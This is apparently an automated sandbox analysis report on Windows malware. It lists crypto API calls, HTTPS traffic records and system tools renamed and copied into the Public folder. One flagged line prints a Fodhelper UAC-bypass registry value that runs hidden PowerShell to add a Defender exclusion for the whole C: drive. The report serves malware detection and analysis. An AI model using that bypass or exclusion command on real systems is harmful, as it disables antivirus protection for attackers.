        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F87340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,9_2_00007FF607F87340
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAB350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,9_2_00007FF607FAB350
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,9_2_00007FF607F7B36C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,9_2_00007FF607FF3390
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD33A0 CryptVerifyCertificateSignature,CertCompareCertificateName,9_2_00007FF607FD33A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080033B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,9_2_00007FF6080033B0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,9_2_00007FF60802739C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080293A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_00007FF6080293A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,9_2_00007FF607FDB3D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB13F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,9_2_00007FF607FB13F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD53E8 CryptEncodeObjectEx,GetLastError,#357,9_2_00007FF607FD53E8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,9_2_00007FF60802141C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF607FF342C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F55438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,9_2_00007FF607F55438
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60800B464 CryptEncodeObjectEx,SetLastError,9_2_00007FF60800B464
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF9480
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDF488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,9_2_00007FF607FDF488
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801F4A0 CryptHashPublicKeyInfo,SetLastError,9_2_00007FF60801F4A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60800B4EC CryptDecodeObjectEx,SetLastError,9_2_00007FF60800B4EC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080214F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,9_2_00007FF6080214F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB3504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,9_2_00007FF607FB3504
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,9_2_00007FF607FF34F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801F570 CryptHashCertificate,SetLastError,9_2_00007FF60801F570
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBB55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,9_2_00007FF607FBB55C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF607FF3590
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608029580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,9_2_00007FF608029580
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F7D5C2
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB55F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,9_2_00007FF607FB55F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD95FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,9_2_00007FF607FD95FC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7F630 CryptAcquireContextW,GetLastError,#357,SetLastError,9_2_00007FF607F7F630
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FEF644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FEF644
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801F650 CryptHashCertificate2,SetLastError,9_2_00007FF60801F650
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,9_2_00007FF607FF3654
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDB664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,9_2_00007FF607FDB664
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F65664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,9_2_00007FF607F65664
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,9_2_00007FF607F7D660
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,9_2_00007FF607FC366C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608019688 CryptFindOIDInfo,#357,#360,#360,#360,9_2_00007FF608019688
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA76B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,9_2_00007FF607FA76B0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60800D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,9_2_00007FF60800D6A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDF6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,9_2_00007FF607FDF6D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF607FF36E8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,9_2_00007FF60801D750
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBF774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,9_2_00007FF607FBF774
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF5768
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC577C #360,#358,CryptDecodeObject,GetLastError,#357,9_2_00007FF607FC577C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60800B794 CryptExportPublicKeyInfoEx,SetLastError,9_2_00007FF60800B794
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,9_2_00007FF607F8D790
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,9_2_00007FF607F6B788
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF607FF37A4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F917D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,9_2_00007FF607F917D4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080097E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,9_2_00007FF6080097E4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,9_2_00007FF607F8F810
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,9_2_00007FF60801F7FC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDB808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,9_2_00007FF607FDB808
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDD850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,9_2_00007FF607FDD850
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,9_2_00007FF607FE184C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF607FF3860
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F87884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,9_2_00007FF607F87884
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC9878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,9_2_00007FF607FC9878
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080298B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,9_2_00007FF6080298B0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDB8D0 I_CryptGetLruEntryData,#357,9_2_00007FF607FDB8D0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC18DC CertFindExtension,CryptDecodeObject,GetLastError,#357,9_2_00007FF607FC18DC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F638FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,9_2_00007FF607F638FC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F73918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F73918
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,9_2_00007FF607FF391C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,9_2_00007FF60801F918

        Privilege Escalation

        barindex
        UAC bypass detected (Fodhelper)
        Source: C:\Users\Public\ger.exeRegistry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"Jump to behavior

        Compliance

        barindex
        Detected unpacking (creates a PE file in dynamic memory)
        Source: C:\Users\Public\Libraries\Ping_c.pifUnpacked PE file: 31.2.Ping_c.pif.2940000.0.unpack
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49726 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53511 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53516 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53520 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53523 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53526 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53529 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53532 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53535 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53538 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53541 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53544 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53547 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53550 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53553 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53558 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53561 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53564 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53567 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53570 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53573 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53576 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53579 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53582 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53585 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53588 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53591 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.8:53594 version: TLS 1.2
        Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000F.00000002.1476976535.0000019BC2D60000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000016.00000000.1518864581.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000016.00000002.1531678646.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.15.dr
        Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1445144057.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1446065132.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1447868032.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1458781343.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1459173324.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1464587284.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1469344959.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1465532908.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1473566813.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1469668285.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000000.1473921005.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000002.1478186750.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1506732117.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1478851202.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000002.1499793462.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000000.1498344325.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000002.1518104695.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000000.1507039984.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000000.1541220928.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000002.1545227076.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.1551820937.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.1548125938.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000000.1552277477.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000002.1552927917.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.1553226732.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.1554180486.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000000.1554505024.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000002.1555442519.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe,
        Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000011.00000000.1479565533.00007FF6BB8EA000.00000002.00000001.01000000.00000007.sdmp, xkn.exe.13.dr
        Source: Binary string: certutil.pdb source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.dr
        Source: Binary string: reg.pdb source: extrac32.exe, 0000000B.00000002.1468605418.0000022844600000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000002.1499281229.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000013.00000000.1498746952.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.11.dr
        Source: Binary string: powershell.pdb source: xkn.exe, 00000011.00000000.1479565533.00007FF6BB8EA000.00000002.00000001.01000000.00000007.sdmp, xkn.exe.13.dr
        Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1445144057.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1446065132.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1447868032.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1458781343.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1459173324.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1464587284.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1469344959.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1465532908.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1473566813.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1469668285.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000000.1473921005.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000002.1478186750.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1506732117.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1478851202.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000002.1499793462.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000000.1498344325.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000002.1518104695.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000000.1507039984.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000000.1541220928.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000002.1545227076.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.1551820937.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.1548125938.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000000.1552277477.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000002.1552927917.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.1553226732.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.1554180486.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000000.1554505024.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000002.1555442519.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 000
        Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000F.00000002.1476976535.0000019BC2D60000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000016.00000000.1518864581.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000016.00000002.1531678646.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.15.dr
        Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000B.00000002.1468605418.0000022844600000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000002.1499281229.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000013.00000000.1498746952.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.11.dr
        Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.dr
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF744F01560
